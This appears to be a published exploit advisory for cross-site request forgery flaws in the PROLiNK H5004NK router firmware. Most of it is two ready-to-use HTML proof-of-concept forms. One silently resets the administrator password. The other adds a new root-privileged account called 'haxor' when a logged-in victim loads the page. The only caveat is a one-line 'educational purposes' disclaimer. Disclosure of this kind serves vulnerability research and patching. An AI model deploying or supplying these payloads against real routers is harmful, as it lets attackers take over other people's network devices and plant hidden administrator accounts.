PROLiNK H5004NK suffers from multiple cross site request forgery vulnerabilities.
b210515168778f66be7b43848af94d8ab68b509ccefdebb2e6027e6451d59008
# Exploit Title: PROLiNK H5004NK Multiple Vulnerabilities
# Date: 16-04-2015
# Firmware: R76S Slt 4WNE1 6.1R
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Disclaimer: Use this for educational purposes only!
#1| Admin Password Manipulation XSRF
-----------------------------------------------------
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="oldpass" value="password" />
<input type="hidden" name="newpass" value="admin" />
<input type="hidden" name="confpass" value="admin" />
<input type="hidden" name="modify" value="Modify" />
<input type="hidden" name="select" value="s0" />
<input type="hidden" name="hiddenpass" value="password" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#2| Adding a New Root Account XSRF
-----------------------------------------------------
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="haxor" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="newpass" value="123" />
<input type="hidden" name="confpass" value="123" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>